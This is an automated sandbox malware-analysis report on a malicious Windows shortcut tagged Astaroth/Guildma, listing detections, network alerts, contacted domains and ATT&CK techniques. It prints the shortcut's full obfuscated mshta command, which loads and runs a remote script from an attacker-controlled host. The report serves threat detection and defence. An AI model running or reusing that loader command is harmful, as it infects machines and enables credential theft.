Windows Analysis Report
V323904LY3.lNK.lnk

Overview

General Information

Sample name: V323904LY3.lNK.lnk
Analysis ID: 1546603
MD5: 2e4c1c46c2c57baf20ef148ec89e47a2
SHA1: 2823f47f3da40c531b538c8edc037c93325dabc5
SHA256: 8c787fa0ec9be5bf076e6c25682a7926aa188a5b9378066008785f165765bc34
Tags: Astaroth, Guildma, lnk, user-abuse_ch

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 5744 cmdline: C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T08:28:19.648837+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 62820 | TCP
2024-11-01T08:28:58.464126+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 62826 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T08:28:01.896363+0100 | 2851288 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 188.114.96.3 | 443 | TCP

AV Detection

Source: V323904LY3.lNK.lnk | Virustotal: Detection: 22%
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2851288 - Severity 1 - ETPRO MALWARE Astaroth Stealer Activity (GET) : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62820
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62826
Source: global traffic | HTTP traffic detected:
    GET /?5/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: plenil324.renmark.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.google.com.br
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: plenil324.renmark.org
Source: global traffic | DNS traffic detected: DNS query: www.google.com.br
Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1695505386.000001C17827D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: hTtpS://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: http://schema.org/WebPage
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com.br/&ec=G
Source: mshta.exe, 00000001.00000002.1696878826.000001C178373000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C17837D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C178380000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://drive.google.com/?tab=wo
Source: mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://news.google.com/?tab=wn
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/?5/.
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/?5/X
Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/?5/lF
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/?5/s
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plenil324.renmark.org/o
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com.br
Source: mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com.br/
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com.br/4
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com.br/AGKb
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com.br/IGSb
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://www.google.com.br/imghp?hl=en&tab=wi
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://www.google.com.br/setprefdomain?prefdom=US&amp;sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3D
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&amp;hl=pt-BR&amp;source=home
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | String found in binary or memory: https://www.youtube.com/?tab=w1
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 62814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62814
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal64.winLNK@1/1@2/2
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htm
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: mshta.exe, 00000001.00000002.1696618599.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
Source: unknown | Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta "javascript:try{try{var _10xlbokj=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];getobject(_10xlbokj[1])[_10xlbokj[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
MITRE ATT&CK Matrix (the number in parentheses beside a technique is the count of matching signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | System Information Discovery (12) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (13) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Ingress Tool Transfer (1) | Traffic Duplication | Data Destruction
Source | Detection | Scanner | Label
V323904LY3.lNK.lnk | 11% | ReversingLabs | Binary.Malware.Nioc
V323904LY3.lNK.lnk | 22% | Virustotal |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
www.google.com.br | 0% | Virustotal |

Source | Detection | Scanner | Label
https://csp.withgoogle.com/csp/gws/other-hp | 0% | URL Reputation | safe
http://schema.org/WebPage | 0% | URL Reputation | safe
https://plenil324.renmark.org/?5/ | 0% | Virustotal |
https://play.google.com/?hl=en&tab=w8 | 0% | Virustotal |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
plenil324.renmark.org | 188.114.96.3 | true | true | | unknown
www.google.com.br | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://plenil324.renmark.org/?5/ | true | | unknown
https://www.google.com.br/ | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com.br/setprefdomain?prefdom=US&amp;sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3D | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://play.google.com/?hl=en&tab=w8 | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://www.google.com/intl/en/about/products?tab=wh | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://www.google.com.br | mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://plenil324.renmark.org/ | mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://csp.withgoogle.com/csp/gws/other-hp | mshta.exe, 00000001.00000002.1696878826.000001C178373000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C17837D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C178380000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/?tab=wo | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://www.google.com.br/AGKb | mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
hTtpS://plenil324.renmark.org/?5/ | mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1695505386.000001C17827D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com.br/imghp?hl=en&tab=wi | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://news.google.com/?tab=wn | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://mail.google.com/mail/?tab=wm | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
http://schema.org/WebPage | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | URL Reputation: safe | unknown
https://www.youtube.com/?tab=w1 | mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr | false | | unknown
https://plenil324.renmark.org/?5/s | mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                              unknown
                              https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&amp;hl=pt-BR&amp;source=homemshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                                unknown
                                https://plenil324.renmark.org/omshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://maps.google.com/maps?hl=en&tab=wlmshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                                    unknown
                                    http://www.google.com/history/optout?hl=enmshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
                                      unknown
                                      https://plenil324.renmark.org/?5/.mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://plenil324.renmark.org/?5/lFmshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.google.com.br/4mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://plenil324.renmark.org/?5/Xmshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.google.com.br/IGSbmshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | plenil324.renmark.org | European Union | 13335 | CLOUDFLARENETUS | true
142.250.138.94 | unknown | United States | 15169 | GOOGLEUS | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1546603
                                                Start date and time:2024-11-01 08:27:10 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
